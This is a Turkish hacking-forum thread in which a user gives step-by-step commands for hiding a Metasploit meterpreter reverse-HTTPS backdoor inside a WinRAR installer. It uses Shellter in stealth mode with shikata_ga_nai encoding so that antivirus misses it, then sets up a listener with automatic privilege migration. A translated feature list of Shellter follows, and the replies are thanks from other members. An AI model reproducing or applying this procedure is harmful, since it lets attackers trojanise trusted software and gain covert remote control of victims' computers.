İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

rar-a backdoor gommek antiviruslardan kacirmak/cewl

25-01-2019 19:56
#1
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.647
Teşekkür (Etti):
0
Teşekkür (Aldı):
725
Konular:
163



Merhaba arkadaslar nasilsiniz bu gunde bi konu acmak karari aldimki dun acacakdim amma ksimet bu gune imis arkadaslar bu konunun maksadi ise arkadaslar bacara bildiyimiz kadaryla anti virusdan kacirmak ve hedef ise ben sanmyorm rarin trojan olduqunu bilsin o uzdenden bu islemleri kali linuks arayiciliqi ile yapacaqim kalide bize yardim edecek proqram ise mettasploit olacakdir neden msfvenom diyorsanizsa o uzdenki mettasploitinde uzerinde encrypt etmeye yarayan scriptler gelmis bu gun onu kullanacagiz ilk asamadan baslayalim asagiya baya parametreler yazacaqim resmler ekleyeceyim ki anlasilmasi kolay olsun deye arkadaslar ilk once bize kali linuksa kecmek ve terminala wineni yuklemesini soylemek ' ee tamam uzerinde yuklu gelir wine amma bu proqrami shellter proqramin calisdirmaz hata veriri o uzdende terminala asagidaki parametreni girelim ve wine32 ni yukleyelim














Kod:
   sudo apt-get install wine32









cikan sonuclara bakdikda ise yuklenmediyini gormus olduq tamam hatayi atlatmamiz icin ne yapa bliriz elbetteki asagidaki 1 2 tane parametreni girerek onara bliriz arkadaslar ilk once ise











Kod:
    sudo apt-get update









soyledik ve paketleri update yani guncelleddik ardinca ise asagidaki parametreni terminala yazalim











Kod:
    dpkg  --add-architecture i386









yazarak arxitekturani yukledik ve ardinca ise asagidaki parametreye bakalim gorelim yukleye bilecekmi deye










Kod:
   sudo apt-get install wine32







yuklemeye basladi sanrim 10 15 dakikamizi ala blir arkadaslar bu yuklenme ve devam edyoruz varsayalmki yuklenme bitti amma acilmiyor wine 32 sakin kizmayin asagidaki parametreni girin










Kod:
   sudo apt-get install -f







soyledik ve gereken ve sistemde bulunmayan wine32 icin lazim olan seyleri indirmis olduq ve sorunsuz casina calisdi wine 32 eyer wine32 yazarsanizsa calismazsa wine yazin arkadaslar (: ha neymis bu wine wine kali linuksda exe dosyalarin acmaya yarayan bi proqamdir baya guzel prowramdir onuda soyleyim farkli farkli proqramlari kurmaya exe formaitndakilar kirmaya yardimci olur evet buraya gibi iyi gelyoruz o zaman baska bir aracida yukleyelim ismi ise bu proqramin Shellter dir arkadaslar bu proqram encryp islemlerinde yani trojani virustotaldan kecirmek icin iyidir gunumuzde en cok kullanilan proqramdir bunu nasilmi indirirsiniz ? asagidaki parametreleri girelm









Kod:
   sudo apt-get install shellter













yazdik ve kuruldukdan sonra ise shellter icin gerekekn proqramciklarin kurulmasi lazim o uzden ise asagidaki parametreni girelim terminala










Kod:
   sudo apt-get install -f









bunuda sorunsuzcasina indirmis olduq ardinca ise yureynizde subhe kalmasin deye terminala shellter yaza blirsiniz acildiqi durumda ise o demekdirki wine32 sorunsuzacsina kurulmusdur bunlarida koyalim 1 kenara gelelim asil meseleye arkadaslar kaliden terminali acalim ve terminala msfconsole yazalim









Kod:
   msfconsole








ardinca is egereken yollari parametreleri payload in yollarin gosterelim








Kod:
   msfconsole










Kod:
   use payload/windows/meterpreter/reverse_winhttps










Kod:
  show options










Kod:
   set lhost (ip)









Kod:
   set lport (port)









Kod:
  generate -E -e x86/shikata_ga_nai -t raw -f /root/isim







ve bir mettasploit arayiciliqi ile kali linuksa root kismina bolmune 1 virustotaldan kazmamiza yardim ede bilecek encrypt atti ve simdi ise kecelim shellere onla winrari o simid yaratmis olduqmuz ismi crypterle balayalim









Kod:
  shellter








Kod:
  wine32 shellter









Kod:
  wine shellter









Kod:
  chose operation mode --> A









Kod:
  pe Target --> /root/iorginalwinrar.exe









Kod:
  enable sthealth mode? --> Y










Kod:
  listed payload custom? --> C









Kod:
  select payload --> /root/ismi










Kod:
  payload reflecter dll list? --> N









Kod:
  use exploit/multi/handler








Kod:
  set payload/windows/meterpreter/reverse_winhttps








Kod:
 set lhost (ip)








Kod:
  set lport (port)








Kod:
  set exitonsessions false









Kod:
  set autoscript post/windows/manager/priv_migrate








Kod:
  run -j





















































































































































































































shellter hakkinda konusmak isderim shellterin kendi sitesi https://www.shellterproject.com/introducing-shellter/


Shellter, dinamik bir shellcode enjeksiyon aracıdır ve şimdiye kadar yaratılmış ilk gerçekten dinamik PE infektörüdür.
Yerel Windows uygulamalarına kabuk kodunu enjekte etmek için kullanılabilir (şu anda yalnızca 32 bit uygulamalar).
Kabuk kodu sizin ya da ****sploit gibi bir çerçeve ile oluşturulan bir şey olabilir.

Shellter, PE dosyasının orijinal yapısından yararlanır ve bölümlerde hafıza erişim izinlerinin değiştirilmesi (kullanıcı istemiyorsa), RWE erişimi ile fazladan bir bölüm eklemek ve bir AV taraması altında tehlikeli görünen herhangi bir değişiklik yapmaz .

Shellter, hedef uygulamanın yürütme akışına dayanan benzersiz bir dinamik yaklaşım kullanıyor ve bu buzdağının sadece görünen kısmı.
Shellter, yürütmeyi yüke yönlendirmek için bir talimat ekleyecek bir yer bulmaya çalışan bir EPO enfektörü değildir. Diğer herhangi bir infektörün aksine, Shellter'ın gelişmiş enfeksiyon motoru yürütme akışını hiçbir zaman bir kod mağarasına veya virüslü PE dosyasındaki ek bir bölüme aktarmaz.

Shellter Pro'da sunulan özel özellikler hakkında bilgi burada bulunabilir .

Ana Özellikler

Windows x86 / x64 (XP SP3 ve üzeri) ve Linux / Mac için Wine / CrossOver ile uyumludur.
Taşınabilir - Kurulum gerekmez.
Fazladan bağımlılık gerektirmez (python, .net, vb…).
Statik PE şablonları, çerçeve sarmalayıcıları vb…
Herhangi bir 32 bitlik yükü destekler (kullanıcı tarafından ****sploit tarafından veya özel olanlar tarafından oluşturulur).
****sploit ile yapılan her türlü kodlama ile uyumludur.
Kullanıcı tarafından oluşturulan özel kodlama ile uyumlu.
Stealth Mode - Orijinal İşlevselliği Korur.
Çok Yüklü PE enfeksiyonu.
Özel Kodlama + Kullanıcı Tanımlı Kodlama Dizisi.
Dinamik iş parçacığı içerik tuşları.
Yansıtıcı DLL yükleyicileri destekler.
Gömülü ****sploit Yükü.
Önemsiz kod Polimorfik motor.
Konu bağlamını tanıyan polimorfik motor.
Kullanıcı kendi polimorfik kodunu kullanabilir.
Anti-statik analiz için Dinamik Konu İçeriği bilgisinden yararlanır.
Kendi kendini değiştiren kodu algılar.
Tek ve çok dişli uygulamaları izler.
Uygulama akışına göre tamamen dinamik enjeksiyon yerleri.
Kullanıcının kullanabileceği enjeksiyon noktalarını söküp gösterir.
Kullanıcı neyin, ne zaman ve nerede enjekte edileceğini seçer.
Komut Satırı desteği.
Ücretsiz







tesekkure layiksa tesekur etmeyi unutmayin (:
Kullanıcı İmzası

Hansi quruhin bele Movlasi var?! Sielerin Hz Abbasi var!
Konu cewl tarafından (25-01-2019 20:28 Saat 20:28 ) değiştirilmiştir.

25-01-2019 20:02
#2
Üyelik tarihi:
11/2015
Nereden:
/etc/passwd
Yaş:
19
Mesajlar:
461
Teşekkür (Etti):
21
Teşekkür (Aldı):
81
Konular:
93
Eline Sağlık Cewl Yararlı Konu
Kullanıcı İmzası
Aman Aman Dostlar Yoldan Geldim Yorgunum
Hedef SolidStar Zirve SoloTürk
Twitter
25-01-2019 20:04
#3
mccan70 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Hogwarts
Mesajlar:
14
Teşekkür (Etti):
8
Teşekkür (Aldı):
0
Konular:
3
eline sağlık abi güzel bir anlatım olmuş
25-01-2019 20:26
#4
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.647
Teşekkür (Etti):
0
Teşekkür (Aldı):
725
Konular:
163
cox saolun (; konya yeniden resm eklenmisdir (:
Kullanıcı İmzası

Hansi quruhin bele Movlasi var?! Sielerin Hz Abbasi var!
25-01-2019 20:35
#5
Lawliet123 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2016
Mesajlar:
2.563
Teşekkür (Etti):
464
Teşekkür (Aldı):
706
Konular:
143
Ya adam anlatmıyor yaşatıyor ya, yazıların arasına koyduğu şeyleri koyarken yorulur insan.
Üstad sen THT için çok değerlisin.



Ellerine sağlık canım kardeşim
Kullanıcı İmzası
Anladıktan sonra, hiçbir şey ilginç gelmez.
▓██▓
▓██▒
▒██░
▒██░ awliet123
░██████▒
░ ▒░▓ ░
░ ░ ▒ ░
░ ░

26-01-2019 23:14
#6
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.647
Teşekkür (Etti):
0
Teşekkür (Aldı):
725
Konular:
163
Alıntı:
Lawliet123´isimli üyeden Alıntı Mesajı göster
Ya adam anlatmıyor yaşatıyor ya, yazıların arasına koyduğu şeyleri koyarken yorulur insan.
Üstad sen THT için çok değerlisin.



Ellerine sağlık canım kardeşim
Cok tesekr ederim. Sen cok guzel bir insansin senin deyerlendirmen bencin zevkdir dosdum valla
Kullanıcı İmzası

Hansi quruhin bele Movlasi var?! Sielerin Hz Abbasi var!
27-01-2019 14:52
#7
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2017
Mesajlar:
2.944
Teşekkür (Etti):
199
Teşekkür (Aldı):
908
Konular:
86
Ellerine Sağlık Cewl Sağlam Konu Olmuş
27-01-2019 14:54
#8
thesunv1 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
Turkey
Mesajlar:
226
Teşekkür (Etti):
25
Teşekkür (Aldı):
33
Konular:
25
eline saglık albayım ++++++++
Kullanıcı İmzası
Ne Mutlu Türküm diyene
27-01-2019 15:18
#9
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.647
Teşekkür (Etti):
0
Teşekkür (Aldı):
725
Konular:
163
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Ellerine Sağlık Cewl Sağlam Konu Olmuş
cok tesekkur ederim guzel insan (:

Alıntı:
thesunv1´isimli üyeden Alıntı Mesajı göster
eline saglık albayım ++++++++
. ve sizede tesekkur ederim (:
Kullanıcı İmzası

Hansi quruhin bele Movlasi var?! Sielerin Hz Abbasi var!
27-01-2019 17:49
#10
Sult - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2017
Nereden:
Tanrı Dağı
Mesajlar:
528
Teşekkür (Etti):
18
Teşekkür (Aldı):
42
Konular:
72
@cewl yaxsi məvzu

Məvzuyu sevdim.

Bir vakiq whatsaap'dan yazirəm
Konu Sult tarafından (27-01-2019 17:51 Saat 17:51 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı